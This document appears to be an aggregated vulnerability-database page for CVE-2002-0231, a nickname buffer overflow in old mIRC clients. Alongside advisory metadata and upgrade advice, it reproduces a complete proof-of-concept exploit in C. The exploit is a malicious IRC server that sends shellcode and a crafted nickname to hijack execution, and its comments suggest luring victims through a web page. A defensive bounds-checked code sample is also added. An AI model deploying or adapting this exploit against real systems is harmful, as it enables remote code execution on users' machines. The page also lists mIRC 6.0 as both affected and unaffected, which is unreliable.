CVE-2002-0231
CVSS7.5
Published: 2002-05-16 00:00:00
Last modified: 2016-10-17 22:17:18

[Original] Buffer overflow in mIRC 5.91 and earlier allows a remote server to execute arbitrary code on the client via a long nickname.


[CNNVD] mIRC Nick Buffer Overflow Vulnerability (CNNVD-200205-042)

mIRC 5.91 and earlier versions contain a buffer overflow vulnerability. A remote server can execute arbitrary code on the client by sending an overly long nickname.

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/a:khaled_mardam-bey:mirc:5.9
cpe:/a:khaled_mardam-bey:mirc:2.3a
cpe:/a:khaled_mardam-bey:mirc:2.5a
cpe:/a:khaled_mardam-bey:mirc:2.7a
cpe:/a:khaled_mardam-bey:mirc:5.91
cpe:/a:khaled_mardam-bey:mirc:2.1a
cpe:/a:khaled_mardam-bey:mirc:3.8
cpe:/a:khaled_mardam-bey:mirc:4.7
cpe:/a:khaled_mardam-bey:mirc:5.6
cpe:/a:khaled_mardam-bey:mirc:3.7
cpe:/a:khaled_mardam-bey:mirc:4.6
cpe:/a:khaled_mardam-bey:mirc:5.5
cpe:/a:khaled_mardam-bey:mirc:3.4
cpe:/a:khaled_mardam-bey:mirc:2.4
cpe:/a:khaled_mardam-bey:mirc:3.3
cpe:/a:khaled_mardam-bey:mirc:5.1
cpe:/a:khaled_mardam-bey:mirc:5.8
cpe:/a:khaled_mardam-bey:mirc:3.9
cpe:/a:khaled_mardam-bey:mirc:5.7
cpe:/a:khaled_mardam-bey:mirc:3.6
cpe:/a:khaled_mardam-bey:mirc:4.5
cpe:/a:khaled_mardam-bey:mirc:5.4
cpe:/a:khaled_mardam-bey:mirc:2.4a
cpe:/a:khaled_mardam-bey:mirc:3.5
cpe:/a:khaled_mardam-bey:mirc:5.3
cpe:/a:khaled_mardam-bey:mirc:3.2
cpe:/a:khaled_mardam-bey:mirc:4.1
cpe:/a:khaled_mardam-bey:mirc:5.0
cpe:/a:khaled_mardam-bey:mirc:3.1
cpe:/a:khaled_mardam-bey:mirc:4.0
cpe:/a:khaled_mardam-bey:mirc:2.8c

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0231
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0231
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200205-042
(official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=101286747013955&w=2
(UNKNOWN)  BUGTRAQ  20020203 Buffer overflow in mIRC allowing arbitary code to be executed.
http://online.securityfocus.com/archive/1/254105
(UNKNOWN)  BUGTRAQ  20020204 Re: Buffer overflow in mIRC allowing arbitary code to be executed.
http://www.iss.net/security_center/static/8083.php
(VENDOR_ADVISORY)  XF  mirc-nickname-bo(8083)
http://www.securityfocus.com/bid/4027
(UNKNOWN)  BID  4027
http://www.uuuppz.com/research/adv-001-mirc.htm
(UNKNOWN)  MISC  http://www.uuuppz.com/research/adv-001-mirc.htm

- Vulnerability information

mIRC Nick Buffer Overflow Vulnerability
High risk   Buffer overflow
2002-05-16 00:00:00 2005-10-20 00:00:00
Remote
mIRC 5.91 and earlier versions contain a buffer overflow vulnerability. A remote server can execute arbitrary code on the client by sending an overly long nickname.

- Advisories and patches

This issue has been addressed in mIRC 6.0. Users are advised to upgrade.

Khaled Mardam-Bey mIRC 2.1 a
Khaled Mardam-Bey mIRC 2.3 a
Khaled Mardam-Bey mIRC 2.4 a
Khaled Mardam-Bey mIRC 2.4
Khaled Mardam-Bey mIRC 2.5 a
Khaled Mardam-Bey mIRC 2.7 a
Khaled Mardam-Bey mIRC 2.8 c
Khaled Mardam-Bey mIRC 3.1
Khaled Mardam-Bey mIRC 3.2
Khaled Mardam-Bey mIRC 3.3
Khaled Mardam-Bey mIRC 3.4
Khaled Mardam-Bey mIRC 3.5
Khaled Mardam-Bey mIRC 3.6
Khaled Mardam-Bey mIRC 3.7
Khaled Mardam-Bey mIRC 3.8
Khaled Mardam-Bey mIRC 3.9
Khaled Mardam-Bey mIRC 4.0
Khaled Mardam-Bey mIRC 4.1
Khaled Mardam-Bey mIRC 4.5
Khaled Mardam-Bey mIRC 4.6
Khaled Mardam-Bey mIRC 4.7
Khaled Mardam-Bey mIRC 5.0
Khaled Mardam-Bey mIRC 5.1
Khaled Mardam-Bey mIRC 5.3
Khaled Mardam-Bey mIRC 5.4
Khaled Mardam-Bey mIRC 5.5
Khaled Mardam-Bey mIRC 5.6
Khaled Mardam-Bey mIRC 5.7
Khaled Mardam-Bey mIRC 5.8
Khaled Mardam-Bey mIRC 5.9
Khaled Mardam-Bey mIRC 5.91

- Vulnerability information (21274)

MIRC 2.x/3.x/4.x/5.x Nick Buffer Overflow Vulnerability (EDBID:21274)
windows remote
2002-02-03 Verified
0 James Martin
source: http://www.securityfocus.com/bid/4027/info

mIRC is a popular Internet Relay Chat client which runs on Microsoft Windows 9x/ME/NT/2000/XP operating systems.

A remotely exploitable buffer overflow condition has been discovered in mIRC. This issue is due to improper bounds checking of nicknames sent by the server. An excessively long nickname (200+ characters) is capable of overwriting stack variables. This may be exploited by a malicious server. This issue is also exploitable via a webpage that can instruct the client to launch and connect to the malicious server.

This may lead to a full compromise of the host running the client software on some Windows systems.

/* Mirc buffer nickname buffer overflow proof of concept exploit.
   Author: James Martin
   Email: me@uuuppz.com
   Website: http://www.uuuppz.com


   This code is purely to demonstrate the risk posed by this flaw.
   It should not be used for malicious purposes. I do not accept
   any responsibility for any damage it may cause due to its use.

   This code compiles in Borland C++ 5.5 command line tools. Run it,
   and type /server 127.0.0.1 2680 (in mirc that is :P).

   This exploit could be modified to work on many editions of mirc
   running on all variants of windows. However due to the messing
   around that is required to place the return address on the stack
   It will work on:
   For the following do not #define EXPLOIT_2K
   Windows 98SE running Mirc 5.91
   Windows 98 running Mirc 5.91
   Windows ME running Mirc 5.91
   With exploit 2K defined it will exploit
   Windows 2K

   The basic concept of this overflow is as follows
   In memory mirc stores the following variables
   [Primarynick(100chars)][Alternativenick(100chars)][WhichNick[dword]]
   There is no length checking on the nickname returned to nick by the server.
   There are two ways to exploit this
   a) Send the msg ":OLDCLIENTNICK NICK NEWCLIENTNICK"
   b) Send ":testserver 001 NEWNICKNAME :blah blah"

   I found method a) on the 24/10/2001 and reported this problem to the author.
   Method b) was published by eSDee of hoepelkoe 23/10/2001 (completely unknown to me!)
   very coincidental really.

   From debugging the code, it seems that this buffer is copied in several places.
   So there may be more places to exploit this than are currently known.

   I spent quite a bit of time analysing the hole, in the end I found
   the way to do it was, to overwrite WhichNick with a value, that would
   cause the currentnickname to reference the stack, then send another nick
   name containing the new version of EIP to be overwritten on the stack.

   For this we need a magic number to be placed in currentnickname, this number
   must satisfy the equation (magicnumber*100)+offset = location of pushed eip. Also
   this magic number must not contain any zero bytes or spaces (value of 32). This
   works by exploiting the integer overflow concept.

   The following is the code which appears in mirc.
   imul    ecx, WhichNick, 64h
   add     ecx, offset PrimaryNick

   Unfortunately the location of the stack varies between different versions of windows.
   NT, Win2k, XP all have the stack in very similar positions but it does move slightly.
   Win98, Win98SE, WinME all have the stack in EXACTLY the same position. Windows 95 is
   different again. Hence having to do a #define for the os you wish to exploit.

   This may seem like quite a large mitigating factor but in reality this is very easy
   to overcome if you couple this exploit with a HTTP server which sends out a page to
   cause mirc to load and attempt to connect to our evil server. As Internet explorer,
   is nice enough to tell us exactly what OS is running! I think we can blame MS for that
   one, talk about giving us a helping hand!
*/

#include<stdio.h>
#include<windows.h>
#include<winsock2.h>
#define SOCKADDRCAST struct sockaddr_in *

// This function binds a listening socket
SOCKET openlistensocket(void) {
   SOCKET s;
   struct sockaddr_in SockAdr;

   // Get a new socket
   s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
   // Set the ip address we are going to bind to
   memset(&SockAdr, 0, sizeof(SockAdr));
   SockAdr.sin_addr.s_addr = inet_addr("0.0.0.0")  ;
   SockAdr.sin_family=AF_INET;
   SockAdr.sin_port=htons(2680);

   printf("2: Starting\n");
   // Attempt to bind socket
   if(bind(s, (SOCKADDRCAST)&SockAdr, sizeof(SockAdr))) {
      // Failed free socket and return -1
      printf("Failed to open, %u\n",WSAGetLastError());

      closesocket(s);
      return(-1);
   } else // Success listen on socket
      if(listen(s, 10)!=SOCKET_ERROR)
        return(s);
      else {
        printf("Failed to open listen socket (listen, %u)\n",WSAGetLastError());

        closesocket(s);
        return(-1);
      }
}

// Shell code, this just launches an executable
// specified following the shell code. Currently
// it does not clean up properly, so mirc will
// crash.
char shellcode[44] = {
0x6A,0x01,0xB8,0xBF,
0x74,0x55,0x44,0xC1,
0xE0,0x08,0xC1,0xE8,
0x08,0x50,0xB8,0x50,
0x90,0x54,0x44,0xC1,
0xE0,0x08,0xC1,0xE8,
0x08,0xFF,0xd0,0x33,
0xDB,0x53,0xB8,0x10,
0x8e,0x54,0x44,0xc1,
0xe0,0x08,0xc1,0xe8,
0x08,0xff,0xd0,0x00};


#define EXPLOI_9x

#define MAGICNUMBER_NT 0x28eb207
#define MAGICNUMBER_2K 0x28eb205
#define MAGICNUMBER_XP 0x28eb205
#define MAGICNUMBER_9x 0x28Fc909
#define OFFSET_NT 20
#define OFFSET_2K 84
#define OFFSET_XP 12
#define OFFSET_9x 180
#define OFFSET_95 184


#ifdef EXPLOIT_NT
 #define MAGICNUMBER MAGICNUMBER_NT
 #define OFFSET OFFSET_NT
#else
 #ifdef EXPLOIT_2K
  #define MAGICNUMBER MAGICNUMBER_2K
  #define OFFSET OFFSET_2K
 #else
  #ifdef EXPLOIT_XP
   #define MAGICNUMBER MAGICNUMBER_XP
   #define OFFSET OFFSET_XP
  #else
   #define MAGICNUMBER MAGICNUMBER_9x
   #ifdef EXPLOIT_95
     #define OFFSET OFFSET_95
   #else
     #define OFFSET OFFSET_9x
   #endif
  #endif
 #endif
#endif

// Our main function
void main() {
  SOCKET s,client;
  char buf1[300],
       buf2[190],
       buf3[1500];
  /* Perform winsock startup */
  WORD wVersionRequested;
  WSADATA wsaData;
  HANDLE h;
  int wsErr;
  int len, *i;
   struct sockaddr_in SockAdr;

  wVersionRequested = MAKEWORD( 1, 1 );
  wsErr = WSAStartup( wVersionRequested, &wsaData );
  printf("1: Initialising %u\n",wsErr);
  if ( wsErr != 0 ) {
    /* Tell the user that we couldn't find a usable */
    /* WinSock DLL.                                  */
    printf("Failed to start winsock exiting\n");
    return;
  }

  // Open Listen Socket
  s = openlistensocket();

  // Accept a connection
  len = sizeof(SockAdr);
  client = accept(s, &SockAdr, &len);
  printf("Accepted\n");

  // Init the two exploit buffers.
  memset(buf1, 'X', sizeof(buf1));
  memset(buf2, 'Y', sizeof(buf1));
  buf1[204] = 0;
  buf2[OFFSET+3] = 0;

  // Set the return address to be popped onto the stack
  buf2[OFFSET] = 0x94;
  buf2[OFFSET+1] = 0x74;
  buf2[OFFSET+2] = 0x55;

  // Set our little magic number
  i = (int *)(buf1+200);
  *i = MAGICNUMBER;

  // Build the exploit string
  sprintf(buf3, ":testserver 001 %s%scalc.exe :ddd\n:testserver 001 %s :x\n:testserver 001 test :x\n",  buf1,shellcode,buf2);

  // Send it
  send(client, buf3, strlen(buf3),0);

  // Wait
  printf("Waiting\n");
  Sleep(10000);

  // Cleanup
  closesocket(client);
  closesocket(s);
}
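As a defender's counterpart to the layout the PoC comment describes, the following added example (not part of the advisory and not James Martin's code) shows what a bounds-checked nick handler looks like: the two 100-byte nick slots and the "which nick" selector are taken from the comment above, while the struct name, function names and the sample welcome lines are constructed for this illustration.

```c
#include <string.h>

/* Layout from the PoC comment: two 100-byte nick slots, then the selector dword
   the client multiplies by 100 (imul ... 64h) to pick a slot. */
#define NICK_SLOT 100
struct nickstate {
    char primary[NICK_SLOT];
    char alternative[NICK_SLOT];
    unsigned which;            /* only 0 or 1 are legitimate */
};

/* Hardened store: the nick must fit its slot and the selector must be 0 or 1.
   Returns 1 on success, 0 when the input is rejected. */
int set_current_nick(struct nickstate *st, const char *nick) {
    size_t n = strlen(nick);
    if (n == 0 || n >= NICK_SLOT) return 0;   /* leave room for the NUL */
    if (st->which > 1) return 0;              /* never index past the two slots */
    memcpy(st->which ? st->alternative : st->primary, nick, n + 1);
    return 1;
}

/* Pull the nick token out of ":server 001 <nick> :text" into a bounded buffer.
   Returns 1 if a token was found and fits, 0 otherwise (overlong is rejected, not truncated). */
int parse_welcome_nick(const char *line, char *out, size_t outsz) {
    const char *p = strchr(line, ' ');
    if (p == NULL || strncmp(p, " 001 ", 5) != 0) return 0;
    p += 5;
    const char *end = strchr(p, ' ');
    size_t n = end ? (size_t)(end - p) : strlen(p);
    if (n == 0 || n >= outsz) return 0;
    memcpy(out, p, n);
    out[n] = '\0';
    return 1;
}

/* Self-check on constructed lines: a normal welcome is accepted; a 204-byte nick
   (the length the PoC sends) and a corrupted selector (the PoC's 9x magic value) are rejected. */
int hardened_handler_selfcheck(void) {
    struct nickstate st = {0};
    char nick[NICK_SLOT], line[300];
    if (!parse_welcome_nick(":testserver 001 alice :Welcome", nick, sizeof nick)) return 0;
    if (!set_current_nick(&st, nick) || strcmp(st.primary, "alice") != 0) return 0;
    memcpy(line, ":testserver 001 ", 16);
    memset(line + 16, 'X', 204);
    strcpy(line + 220, " :ddd");
    if (parse_welcome_nick(line, nick, sizeof nick)) return 0;
    st.which = 0x28fc909u;
    return set_current_nick(&st, "bob") == 0;
}
```

The check rejects an overlong token outright rather than truncating it, so a server can never place more than 99 bytes plus the terminator into either slot.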

- Vulnerability information

6404
mIRC Long Nickname Parsing Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public Vendor Verified, Third-party Verified

- Vulnerability description

A remote overflow exists in mIRC. It fails to validate nickname strings resulting in a buffer overflow. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.

- Timeline

2001-10-24 2001-10-24
2001-12-15 Unknown

- Solution

Upgrade to version 6.0 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- References

- Vulnerability author

- Vulnerability information

MIRC Nick Buffer Overflow Vulnerability
Boundary Condition Error 4027
Yes No
2002-02-03 12:00:00 2009-07-11 09:56:00
This vulnerability was submitted to BugTraq on February 3rd, 2002 by "James Martin" <me@uuuppz.com>.

- Affected program versions

Khaled Mardam-Bey mIRC 5.91
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows XP Home
Khaled Mardam-Bey mIRC 5.9
Khaled Mardam-Bey mIRC 5.8
Khaled Mardam-Bey mIRC 5.7
Khaled Mardam-Bey mIRC 5.6
Khaled Mardam-Bey mIRC 5.5
Khaled Mardam-Bey mIRC 5.4
Khaled Mardam-Bey mIRC 5.3
Khaled Mardam-Bey mIRC 5.1
Khaled Mardam-Bey mIRC 5.0
Khaled Mardam-Bey mIRC 4.7
Khaled Mardam-Bey mIRC 4.6
Khaled Mardam-Bey mIRC 4.5
Khaled Mardam-Bey mIRC 4.1
Khaled Mardam-Bey mIRC 4.0
Khaled Mardam-Bey mIRC 3.9
Khaled Mardam-Bey mIRC 3.8
Khaled Mardam-Bey mIRC 3.7
Khaled Mardam-Bey mIRC 3.6
Khaled Mardam-Bey mIRC 3.5
Khaled Mardam-Bey mIRC 3.4
Khaled Mardam-Bey mIRC 3.3
Khaled Mardam-Bey mIRC 3.2
Khaled Mardam-Bey mIRC 3.1
Khaled Mardam-Bey mIRC 2.8 c
Khaled Mardam-Bey mIRC 2.7 a
Khaled Mardam-Bey mIRC 2.5 a
Khaled Mardam-Bey mIRC 2.4 a
Khaled Mardam-Bey mIRC 2.4
Khaled Mardam-Bey mIRC 2.3 a
Khaled Mardam-Bey mIRC 2.1 a
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 95 SR2
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
Khaled Mardam-Bey mIRC 6.0
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows XP Home

- Unaffected program versions

Khaled Mardam-Bey mIRC 6.0
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows XP Home

- Exploit

This exploit was submitted by "James Martin" <me@uuuppz.com>.

- Solution

This issue has been addressed in mIRC 6.0. Users are advised to upgrade.

- References
